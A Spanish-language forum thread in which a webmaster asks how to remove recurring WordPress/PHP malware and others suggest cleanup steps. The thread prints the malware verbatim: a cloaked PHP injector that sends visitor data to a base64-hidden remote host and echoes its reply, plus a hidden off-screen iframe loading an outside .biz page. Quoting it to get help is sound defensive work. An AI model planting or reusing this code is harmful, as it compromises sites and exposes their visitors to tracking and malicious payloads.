Ayuda con virus wordpress

tumastervip · 2013-08-26T20:26:40-0500

Estoy cansado de eliminar a cada momento este maldito virus, se está esparciendo por todo mi hosting donde tengo algunas webs alojadas, la verdad no se qué hacer esta metiéndose a cada archivo php que encuentra tengo algunas en wordpress y otras en php, nunca me había pasado algo igual, estoy abrumado y desesperado, si alguien paso por algo similar y sepa cómo resolverlo espero que me den una manito.

A continuación pongo el código php de infección, y un iframe que se creó también.

PHP:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

Iframe
<iframe src="http://britannicacomfast.biz:59334/cnet/user_files/updates.php?refer=1" width="100" height="100" style="width:100px;height:100px;position:absolute;left:-10000px;top:0;"></iframe>

Gracias de antemano.

Federico Piccoli · 2013-08-27T02:04:36-0500

Ciao

Si la infeccion se repite yo pensaria en cambiar de hosting (que en general son poco o nada seguros) y a la vez pensaria tambien en limpiar mi pc que puede ser el foco de infeccion.

miguelitorodriguez · 2013-08-27T10:34:22-0500

Interesante código, lo analizare .

axdds34 · 23 Sep 2013

Hola [MENTION=3751]tumastervip[/MENTION] conseguiste solucionar este error.???

danielbp · 23 Sep 2013

borrar y eliminar código y cambiar todas y cada una de las contraseñas (ftp, acceso al admin, etc.) y hacerlas más robustas puede ser una buena solución momentánea... y que suele funcionar en el tiempo

tumastervip · 23 Sep 2013

axdds34 dijo:
Hola [MENTION=3751]tumastervip[/MENTION] conseguiste solucionar este error.???

Si, tuve que eliminar el virus manualmente, estaban en los JS y algunos php.

Ayuda con virus wordpress

tumastervip Seguir

Federico Piccoli

miguelitorodriguez

axdds34

danielbp

tumastervip